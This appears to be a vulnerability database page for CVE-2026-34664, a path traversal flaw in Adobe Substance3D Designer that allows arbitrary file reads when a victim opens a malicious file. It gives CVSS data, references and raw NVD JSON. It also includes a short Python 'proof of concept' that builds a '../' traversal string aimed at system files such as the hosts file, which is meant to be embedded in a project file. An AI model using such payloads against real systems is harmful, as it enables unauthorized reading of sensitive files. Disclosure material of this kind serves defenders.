CVE-2026-34664

Description

Substance3D - Designer versions 15.1.0 and earlier are affected by an Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability that could lead to arbitrary file system read. An attacker could exploit this vulnerability to access sensitive files and directories outside the intended access scope. Exploitation of this issue requires user interaction in that a victim must open a malicious file. Scope is changed.

CVSS Details

CVSS Score

6.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:adobe:substance_3d_designer:*:*:*:*:*:*:*:* - VULNERABLE

Adobe Substance3D Designer <= 15.1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# Proof of Concept (PoC) for CVE-2026-34664
# This script demonstrates the concept of crafting a path traversal payload.
# An attacker would embed this path into a file supported by Substance3D Designer.

def generate_malicious_path(target_file):
    """
    Generates a path traversal string to access files outside the restricted directory.
    """
    # Attempting to escape the directory structure to reach a sensitive file
    traversal_payload = "../../../../../../" + target_file
    return traversal_payload

if __name__ == "__main__":
    # Example target: Windows hosts file or Linux passwd file
    target = "windows/system32/drivers/etc/hosts"
    payload = generate_malicious_path(target)
    print(f"[+] Malicious Path Generated: {payload}")
    print("[!] This payload should be embedded in a Substance3D Designer project file.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-34664
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-34664
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-34664/
[4] VulDB https://vuldb.com/cve/CVE-2026-34664
[5] https://helpx.adobe.com/security/products/substance3d_designer/apsb26-52.html

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-34664", "sourceIdentifier": "[email protected]", "published": "2026-05-12T19:16:31.157", "lastModified": "2026-05-13T19:40:05.580", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Substance3D - Designer versions 15.1.0 and earlier are affected by an Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability that could lead to arbitrary file system read. An attacker could exploit this vulnerability to access sensitive files and directories outside the intended access scope. Exploitation of this issue requires user interaction in that a victim must open a malicious file. Scope is changed."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 4.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:adobe:substance_3d_designer:*:*:*:*:*:*:*:*", "versionEndIncluding": "15.1.0", "matchCriteriaId": "02A59C2B-6B46-4A8E-A2A6-8BEF77AB7122"}]}]}], "references": [{"url": "https://helpx.adobe.com/security/products/substance3d_designer/apsb26-52.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}